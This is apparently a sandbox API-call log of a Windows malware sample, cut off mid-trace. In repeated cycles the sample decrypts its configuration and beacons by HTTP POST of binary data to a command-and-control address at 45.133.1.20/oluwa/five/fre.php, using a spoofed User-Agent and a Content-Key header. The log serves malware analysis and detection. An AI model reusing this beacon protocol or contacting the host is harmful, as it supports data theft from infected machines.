[0251.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.790] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0251.790] GetProcessHeap () returned 0x6a0000 [0251.790] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0251.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.791] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0251.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.792] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0251.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.796] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0251.797] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.797] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0251.797] GetProcessHeap () returned 0x6a0000 [0251.797] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0251.797] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0251.797] GetProcessHeap () returned 0x6a0000 [0251.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0251.798] GetProcessHeap () returned 0x6a0000 [0251.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0251.798] GetProcessHeap () returned 0x6a0000 [0251.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0251.798] GetProcessHeap () returned 0x6a0000 [0251.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0251.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.799] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.804] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0251.811] GetProcessHeap () returned 0x6a0000 [0251.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0251.812] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.812] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0251.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.813] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.814] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.814] GetProcessHeap () returned 0x6a0000 [0251.814] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0251.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.815] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0251.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.816] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0251.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.817] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0251.817] GetProcessHeap () returned 0x6a0000 [0251.817] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0251.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.818] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0251.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.819] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0251.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.820] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0251.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.821] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0251.821] GetProcessHeap () returned 0x6a0000 [0251.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0251.821] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0251.821] GetProcessHeap () returned 0x6a0000 [0251.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0251.821] socket (af=2, type=1, protocol=6) returned 0x850 [0251.822] connect (s=0x850, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0251.847] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0251.847] GetProcessHeap () returned 0x6a0000 [0251.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0251.847] GetProcessHeap () returned 0x6a0000 [0251.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0251.848] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0251.849] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0251.849] GetProcessHeap () returned 0x6a0000 [0251.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba438 [0251.849] GetProcessHeap () returned 0x6a0000 [0251.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0251.850] GetProcessHeap () returned 0x6a0000 [0251.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0251.850] GetProcessHeap () returned 0x6a0000 [0251.850] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0251.850] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0251.851] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0251.851] GetProcessHeap () returned 0x6a0000 [0251.851] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0251.851] GetProcessHeap () returned 0x6a0000 [0251.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0251.852] send (s=0x850, buf=0x6bd460*, len=242, flags=0) returned 242 [0251.853] send (s=0x850, buf=0x6bb998*, len=159, flags=0) returned 159 [0251.853] GetProcessHeap () returned 0x6a0000 [0251.853] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0251.853] recv (in: s=0x850, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0251.936] GetProcessHeap () returned 0x6a0000 [0251.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0251.936] GetProcessHeap () returned 0x6a0000 [0251.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0251.937] GetProcessHeap () returned 0x6a0000 [0251.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba438 | out: hHeap=0x6a0000) returned 1 [0251.937] GetProcessHeap () returned 0x6a0000 [0251.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0251.938] closesocket (s=0x850) returned 0 [0251.938] GetProcessHeap () returned 0x6a0000 [0251.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0251.938] GetProcessHeap () returned 0x6a0000 [0251.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0251.939] GetProcessHeap () returned 0x6a0000 [0251.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0251.939] GetProcessHeap () returned 0x6a0000 [0251.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0251.940] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1580) returned 0x850 [0251.941] Sleep (dwMilliseconds=0xea60) [0251.943] GetProcessHeap () returned 0x6a0000 [0251.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0251.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.945] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.952] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0251.959] GetProcessHeap () returned 0x6a0000 [0251.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6c68 [0251.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.960] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b6c68, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0251.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.961] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0251.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.962] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0251.962] GetProcessHeap () returned 0x6a0000 [0251.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6c68 | out: hHeap=0x6a0000) returned 1 [0251.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.964] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0251.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.969] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0251.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.970] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0251.970] GetProcessHeap () returned 0x6a0000 [0251.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0251.971] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.971] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0251.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.972] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0251.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.973] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0251.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.983] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0251.983] GetProcessHeap () returned 0x6a0000 [0251.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0251.983] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0251.983] GetProcessHeap () returned 0x6a0000 [0251.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0251.984] GetProcessHeap () returned 0x6a0000 [0251.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0251.984] GetProcessHeap () returned 0x6a0000 [0251.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0251.984] GetProcessHeap () returned 0x6a0000 [0251.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0251.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.985] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0251.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0251.992] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0252.001] GetProcessHeap () returned 0x6a0000 [0252.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0252.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.002] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0252.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.003] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0252.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.003] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.003] GetProcessHeap () returned 0x6a0000 [0252.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0252.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.007] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0252.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.009] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0252.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.011] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0252.012] GetProcessHeap () returned 0x6a0000 [0252.012] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0252.015] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.015] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0252.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.017] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0252.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.018] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0252.018] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.019] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0252.019] GetProcessHeap () returned 0x6a0000 [0252.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0252.019] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0252.019] GetProcessHeap () returned 0x6a0000 [0252.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0252.019] socket (af=2, type=1, protocol=6) returned 0x854 [0252.020] connect (s=0x854, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0252.052] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0252.052] GetProcessHeap () returned 0x6a0000 [0252.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0252.053] GetProcessHeap () returned 0x6a0000 [0252.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0252.053] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0252.054] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0252.055] GetProcessHeap () returned 0x6a0000 [0252.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba438 [0252.055] GetProcessHeap () returned 0x6a0000 [0252.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0252.055] GetProcessHeap () returned 0x6a0000 [0252.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0252.055] GetProcessHeap () returned 0x6a0000 [0252.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0252.056] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0252.057] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0252.057] GetProcessHeap () returned 0x6a0000 [0252.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0252.057] GetProcessHeap () returned 0x6a0000 [0252.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0252.057] send (s=0x854, buf=0x6bd460*, len=242, flags=0) returned 242 [0252.058] send (s=0x854, buf=0x6bb998*, len=159, flags=0) returned 159 [0252.058] GetProcessHeap () returned 0x6a0000 [0252.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0252.058] recv (in: s=0x854, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0252.131] GetProcessHeap () returned 0x6a0000 [0252.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0252.132] GetProcessHeap () returned 0x6a0000 [0252.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0252.135] GetProcessHeap () returned 0x6a0000 [0252.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba438 | out: hHeap=0x6a0000) returned 1 [0252.136] GetProcessHeap () returned 0x6a0000 [0252.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0252.137] closesocket (s=0x854) returned 0 [0252.143] GetProcessHeap () returned 0x6a0000 [0252.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0252.143] GetProcessHeap () returned 0x6a0000 [0252.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0252.144] GetProcessHeap () returned 0x6a0000 [0252.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0252.144] GetProcessHeap () returned 0x6a0000 [0252.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0252.144] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1584) returned 0x854 [0252.206] Sleep (dwMilliseconds=0xea60) [0252.211] GetProcessHeap () returned 0x6a0000 [0252.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0252.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.213] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0252.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.229] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0252.240] GetProcessHeap () returned 0x6a0000 [0252.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0252.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.241] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0252.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.242] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0252.243] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.243] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.243] GetProcessHeap () returned 0x6a0000 [0252.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0252.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.245] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0252.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.246] CryptDestroyKey (hKey=0x6ad020) returned 1 [0252.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.251] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0252.251] GetProcessHeap () returned 0x6a0000 [0252.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0252.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.252] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0252.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.253] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0252.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.254] StrStrA 